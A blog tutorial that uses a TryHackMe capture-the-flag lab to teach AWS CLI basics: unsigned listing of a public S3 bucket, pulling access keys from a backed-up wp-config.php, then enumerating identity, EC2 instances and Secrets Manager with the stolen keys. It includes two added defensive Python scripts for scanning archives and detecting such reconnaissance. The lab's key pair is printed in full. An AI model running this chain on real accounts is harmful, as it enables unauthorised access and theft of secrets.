AWS: Getting started with Amazon Web Services Command Line Interface (CLI) Part II

Arcy Caparros
Dec 26, 2021

AWS CLI Part I showed us how simple it is to install the CLI on Windows (CMD & PowerShell) and 64-bit Linux. As we dive deeper into using the AWS CLI, let’s start by learning some basic commands.

Amazon S3

Amazon Simple Storage Service (Amazon S3) is, per Amazon's definition, an object storage service offering industry-leading scalability, data availability, security, and performance. S3 is object storage built to store and retrieve data from anywhere (applications, on-premises, or cloud), and the container that holds that data is called a ‘bucket’.

You create a bucket, specify an AWS region (datacenters), set up your access controls as to which is public and privately accessible, and publish your data.

Here’s the S3 workflow so we can paint a better picture of their process.

Setting up S3 access controls is where it gets tricky, and a mistake can expose sensitive company data. The example below is for educational purposes only. The information that I used is from TryHackMe's Advent of Cyber 3, which highlights the importance of securing data in S3.

Discovering Bucket Names

The image that was given to us in THM’s Cloud Elf Leaks challenge is

So by just looking at the URL, we have “https://s3.amazonaws.com/images.bestfestivalcompany.com/flyer.png” and our S3 Bucket name is “images.bestfestivalcompany.com”.

Further enumerating from this bucket.

With our AWS CLI installed, we want to check if we can enumerate/list any additional files from this bucket. The command that I used to list additional files within this bucket is:

aws s3 ls s3://images.bestfestivalcompany.com --no-sign-request

To get additional help on running s3 commands, simply type in ‘aws s3 help’

PS C:\Users\rcaparros\.aws> aws s3 help
s3
^^
Description
***********
This section explains prominent concepts and notations in the set of
high-level S3 commands provided.......

Downloading Files

Within the list of files we found in our bucket, let’s download the ‘flag.txt’

PS C:\Users\rcaparros\.aws> aws s3 cp s3://images.bestfestivalcompany.com/flag.txt .  --no-sign-request
download: s3://images.bestfestivalcompany.com/flag.txt to .\flag.txt

Notice the “.” after the file name flag.txt: it is the destination, meaning the current folder, so the file is saved there under the same name.

Reading the content of our flag.txt file.

PS C:\Users\rcaparros\.aws> Get-Content .\flag.txt
It's easy to get your elves data when you leave it so easy to find!

AWS Identity and Access Management

We briefly discussed access control earlier. AWS's definition of Identity and Access Management (IAM) states that it is a web service that helps you securely control access to AWS resources. You use IAM to control who is authenticated (signed in) and authorized (has permissions) to use resources.

Reconnaissance in IAM

The key to exploiting IAM is finding credentials. Just because we have access to a publicly accessible bucket does not mean that we have all the access we need.

Based on the same example that we are working with, we did notice that we have a backup file named ‘wp-backup.zip’. Let’s explore that file.

Download ‘wp-backup.zip’ and extract

PS C:\Users\rcaparros\Documents\thm\Adventofcyber3> aws s3 cp s3://images.bestfestivalcompany.com/wp-backup.zip .  --no-sign-request
download: s3://images.bestfestivalcompany.com/wp-backup.zip to .\wp-backup.zip
Unzip wp-backup.zip
PS C:\Users\rcaparros\Documents\thm\Adventofcyber3> Expand-Archive -LiteralPath .\wp-backup.zip -DestinationPath .\wp-backup\

Exploring wp-backup

There are quite a few files to cover within this backup folder, so we’ll skip to the file that has the information we need — wp-config.php

PS C:\Users\rcaparros\Documents\thm\Adventofcyber3\wp-backup\wp_backup> Get-Content .\wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
******
/* Add any custom values between this line and the "stop editing" line. */
define('S3_UPLOADS_BUCKET', 'images.bestfestivalcompany.com');
define('S3_UPLOADS_KEY', 'AKIAQI52OJVCPZXFYAOI');
define('S3_UPLOADS_SECRET', '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');
define('S3_UPLOADS_REGION', 'us-east-1');

Based on the information above, we have an AWS Access Key ID of AKIAQI52OJVCPZXFYAOI and an S3 region of us-east-1.
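The keys above were readable because a config file holding working credentials went into a backup stored in a public bucket. As an added example (not from the original post), this Python check scans a zip archive for AWS access key IDs and quoted 40-character secrets before it is uploaded; the archive is built in memory using AWS's documentation example keys, and the function names are hypothetical.

```python
import io
import re
import zipfile

# Access key IDs: 'AKIA' (long-term) or 'ASIA' (temporary) + 16 upper-case alphanumerics.
KEY_ID = re.compile(r"\b(?:AKIA|ASIA)[A-Z0-9]{16}\b")
# A quoted 40-character base64-style value assigned to a name containing SECRET,
# e.g. define('S3_UPLOADS_SECRET', '...').
SECRET = re.compile(r"""SECRET[A-Z_]*['"]\s*,\s*['"]([A-Za-z0-9/+=]{40})['"]""")

def scan_archive(zip_bytes):
    """Return (member, line_no, kind) findings; matched values are never echoed."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            text = zf.read(info).decode("utf-8", errors="replace")
            for no, line in enumerate(text.splitlines(), 1):
                if KEY_ID.search(line):
                    findings.append((info.filename, no, "access-key-id"))
                if SECRET.search(line):
                    findings.append((info.filename, no, "secret-access-key"))
    return findings

def build_sample_backup():
    """Constructed backup: one clean file, one config holding AWS's documentation example keys."""
    config = (
        "<?php\n"
        "define('S3_UPLOADS_BUCKET', 'example-bucket');\n"
        "define('S3_UPLOADS_KEY', 'AKIAIOSFODNN7EXAMPLE');\n"
        "define('S3_UPLOADS_SECRET', 'wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY');\n"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("wp_backup/index.php", "<?php // silence\n")
        zf.writestr("wp_backup/wp-config.php", config)
    return buf.getvalue()

if __name__ == "__main__":
    for member, line_no, kind in scan_archive(build_sample_backup()):
        print(f"{member}:{line_no}: {kind}")
```

A non-empty result is a reason to stop the upload, rotate the key, and move the credential out of the file.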

If we need to find more information from the data that we currently have, we have to create a profile. A named profile is a collection of settings and credentials that you can apply to an AWS CLI command, which can possibly lead us to additional information such as, but not limited to:

  • Security Token Service (STS)
  • Get-caller-identity
  • Listing all the EC2 instances running in an account

Building Profile

To build a profile, simply run ‘aws configure --profile PROFILENAME’. Based on our example, we’ll create a profile called “hr”. Fill in the information that is needed and follow the settings below.

Now that we have our ‘hr’ profile built, let’s run additional commands and see if we can dig up more information.

  • Finding the Account ID belonging to an access key
aws sts get-access-key-info --access-key-id AKIAQI52OJVCPZXFYAOI --profile hr
{
"Account": "019181489476"
}
  • Determining the Username the access key you’re using belongs to
aws sts get-caller-identity --profile hr
{
"UserId": "AIDAQI52OJVCFHT3E73BO",
"Account": "019181489476",
"Arn": "arn:aws:iam::019181489476:user/ElfMcHR@bfc.com"
}
  • Listing all the EC2 instances running in an account
aws ec2 describe-instances --output text --profile hr
RESERVATIONS 019181489476 043234062703 r-0e89ba65b28a7c699
INSTANCES 0 x86_64 HR-Po-Insta-1NAKAMW2PPVMT False True xen ami-0c2b8ca1dad447f8a i-0c56041ac61cf5a95 t3a.micro hr-key 2021-11-13T12:36:58+00:00 Linux/UNIX ip-172-31-68-81.ec2.internal 172.31.68.81 /dev/xvda ebs True User initiated (2021-11-13 12:42:39 GMT) subnet-00b1107c0c18c0722 RunInstances 2021-11-13T12:36:58+00:00 hvm vpc-0235b5a9591606b73
BLOCKDEVICEMAPPINGS /dev/xvda
EBS 2021-11-13T12:36:59+00:00 True attached vol-0ac79339aac8b249d
CAPACITYRESERVATIONSPECIFICATION open
CPUOPTIONS 1 2
ENCLAVEOPTIONS False
HIBERNATIONOPTIONS False
METADATAOPTIONS enabled disabled 1 optional applied
MONITORING disabled
NETWORKINTERFACES interface 16:35:78:d8:60:d1 eni-027945da0ddb79e59 019181489476 ip-172-31-68-81.ec2.internal 172.31.68.81 True in-use subnet-00b1107c0c18c0722 vpc-0235b5a9591606b73
ATTACHMENT 2021-11-13T12:36:58+00:00 eni-attach-0d91e2137f6014220 True 0 0 attached
GROUPS sg-0c6e7cd87c1c8d035 default
PRIVATEIPADDRESSES True ip-172-31-68-81.ec2.internal 172.31.68.81
PLACEMENT us-east-1f default
PRIVATEDNSNAMEOPTIONS False False ip-name
SECURITYGROUPS sg-0c6e7cd87c1c8d035 default
STATE 80 stopped
STATEREASON Client.UserInitiatedShutdown Client.UserInitiatedShutdown: User initiated shutdown
TAGS aws:cloudformation:stack-id arn:aws:cloudformation:us-east-1:019181489476:stack/HR-Portal/5ebc4e90-447e-11ec-a711-12d63f44d7b7
TAGS aws:cloudformation:logical-id Instance
TAGS created_by Elf McHR
TAGS aws:cloudformation:stack-name HR-Portal
TAGS Name HR-Portal
  • Listing all the EC2 instances running in an account in a different region
aws ec2 describe-instances --output text --region us-east-1 --profile hr
RESERVATIONS 019181489476 043234062703 r-0e89ba65b28a7c699
INSTANCES 0 x86_64 HR-Po-Insta-1NAKAMW2PPVMT False True xen ami-0c2b8ca1dad447f8a i-0c56041ac61cf5a95 t3a.micro hr-key 2021-11-13T12:36:58+00:00 Linux/UNIX ip-172-31-68-81.ec2.internal 172.31.68.81 /dev/xvda ebs True User initiated (2021-11-13 12:42:39 GMT) subnet-00b1107c0c18c0722 RunInstances 2021-11-13T12:36:58+00:00 hvm vpc-0235b5a9591606b73
BLOCKDEVICEMAPPINGS /dev/xvda
EBS 2021-11-13T12:36:59+00:00 True attached vol-0ac79339aac8b249d
CAPACITYRESERVATIONSPECIFICATION open
CPUOPTIONS 1 2
ENCLAVEOPTIONS False
HIBERNATIONOPTIONS False
METADATAOPTIONS enabled disabled 1 optional applied
MONITORING disabled
NETWORKINTERFACES interface 16:35:78:d8:60:d1 eni-027945da0ddb79e59 019181489476 ip-172-31-68-81.ec2.internal 172.31.68.81 True in-use subnet-00b1107c0c18c0722 vpc-0235b5a9591606b73
ATTACHMENT 2021-11-13T12:36:58+00:00 eni-attach-0d91e2137f6014220 True 0 0 attached
GROUPS sg-0c6e7cd87c1c8d035 default
PRIVATEIPADDRESSES True ip-172-31-68-81.ec2.internal 172.31.68.81
PLACEMENT us-east-1f default
PRIVATEDNSNAMEOPTIONS False False ip-name
SECURITYGROUPS sg-0c6e7cd87c1c8d035 default
STATE 80 stopped
STATEREASON Client.UserInitiatedShutdown Client.UserInitiatedShutdown: User initiated shutdown
TAGS aws:cloudformation:stack-id arn:aws:cloudformation:us-east-1:019181489476:stack/HR-Portal/5ebc4e90-447e-11ec-a711-12d63f44d7b7
TAGS aws:cloudformation:logical-id Instance
TAGS created_by Elf McHR
TAGS aws:cloudformation:stack-name HR-Portal
TAGS Name HR-Portal

Secrets Manager

Amazon Web Services Secrets Manager provides a service to enable you to store, manage, and retrieve secrets.

aws secretsmanager list-secrets --profile hr
{
"SecretList": [
{
"ARN": "arn:aws:secretsmanager:us-east-1:019181489476:secret:HR-Password-8AkWYF",
"Name": "HR-Password",
"Description": "Portal DB Secret",
"LastChangedDate": "2021-11-23T20:29:07.812000-05:00",
"LastAccessedDate": "2021-12-25T19:00:00-05:00",
"Tags": [
{
"Key": "aws:cloudformation:stack-name",
"Value": "HR-Portal"
},
{
"Key": "aws:cloudformation:logical-id",
"Value": "FalseSecret"
},
{
"Key": "aws:cloudformation:stack-id",
"Value": "arn:aws:cloudformation:us-east-1:019181489476:stack/HR-Portal/5ebc4e90-447e-11ec-a711-12d63f44d7b7"
},
{
"Key": "created_by",
"Value": "Elf McHR"
},
{
"Key": "Name",
"Value": "Payroll"
}
],
"SecretVersionsToStages": {
"70630b3c-4fbe-4a24-885d-18445bd808b1": [
"AWSCURRENT"
],
"a702190e-69f7-4a8a-81fd-3d20b486657a": [
"AWSPREVIOUS"
]
},
"CreatedDate": "2021-11-13T07:36:56.521000-05:00"
}
]
}
  • Specify a region
aws secretsmanager get-secret-value --secret-id HR-Password --profile hr --region us-east-1
{
"ARN": "arn:aws:secretsmanager:us-east-1:019181489476:secret:HR-Password-8AkWYF",
"Name": "HR-Password",
"VersionId": "70630b3c-4fbe-4a24-885d-18445bd808b1",
"SecretString": "The Secret you're looking for is not in this **REGION**. Santa wants to have low latency to his databases. Look closer to where he lives.",
"VersionStages": [
"AWSCURRENT"
],
"CreatedDate": "2021-11-23T20:29:07.718000-05:00"
}
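The get-caller-identity, describe-instances, list-secrets and get-secret-value commands run with the ‘hr’ profile are all API calls that CloudTrail can record in the key owner's account. As an added example (not from the original post), this Python rule flags an access key that checks its own identity and then makes several of those calls within ten minutes; the records, key IDs, window and threshold are constructed assumptions.

```python
from datetime import datetime, timedelta

# Event names matching the calls shown on this page after the identity check.
RECON = {"DescribeInstances", "ListSecrets", "GetSecretValue"}
WINDOW = timedelta(minutes=10)  # assumed window, tune per environment

def _ts(event):
    """Parse CloudTrail's UTC eventTime, e.g. 2021-12-25T19:00:05Z."""
    return datetime.strptime(event["eventTime"], "%Y-%m-%dT%H:%M:%SZ")

def suspicious_keys(events, min_distinct=2):
    """Map accessKeyId -> calls/regions when GetCallerIdentity is followed by
    at least min_distinct different RECON calls inside WINDOW."""
    by_key = {}
    for ev in sorted(events, key=_ts):
        key = ev.get("userIdentity", {}).get("accessKeyId")
        if key:
            by_key.setdefault(key, []).append(ev)
    alerts = {}
    for key, evs in by_key.items():
        for i, first in enumerate(evs):
            if first["eventName"] != "GetCallerIdentity":
                continue
            burst = [e for e in evs[i + 1:] if e["eventName"] in RECON
                     and _ts(e) - _ts(first) <= WINDOW]
            calls = sorted({e["eventName"] for e in burst})
            if len(calls) >= min_distinct:
                regions = sorted({e["awsRegion"] for e in burst})
                alerts[key] = {"calls": calls, "regions": regions}
                break
    return alerts

def _ev(time, name, region, key):
    """Build one constructed CloudTrail-style record with only the fields used here."""
    return {"eventTime": f"2021-12-25T{time}Z", "eventName": name,
            "awsRegion": region, "userIdentity": {"accessKeyId": key}}

# Constructed records: placeholder key IDs, not values from the page.
SAMPLE = [
    _ev("19:00:05", "GetCallerIdentity", "us-east-1", "AKIAEXAMPLEHRUSER001"),
    _ev("19:00:40", "DescribeInstances", "us-east-1", "AKIAEXAMPLEHRUSER001"),
    _ev("19:01:10", "ListSecrets", "us-east-1", "AKIAEXAMPLEHRUSER001"),
    _ev("19:02:30", "GetSecretValue", "us-west-2", "AKIAEXAMPLEHRUSER001"),
    _ev("19:03:00", "GetSecretValue", "us-east-1", "AKIAEXAMPLEAPPKEY002"),
]

if __name__ == "__main__":
    print(suspicious_keys(SAMPLE))
```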

Conclusion

This concludes our lessons for exploring Amazon’s CLI. This is only one of the many features that the CLI can offer.

References:

  1. https://tryhackme.com/room/adventofcyber3
  2. https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-regions-availability-zones.html#concepts-available-regions
  3. https://docs.aws.amazon.com/secretsmanager/latest/userguide/tutorials_basic.html
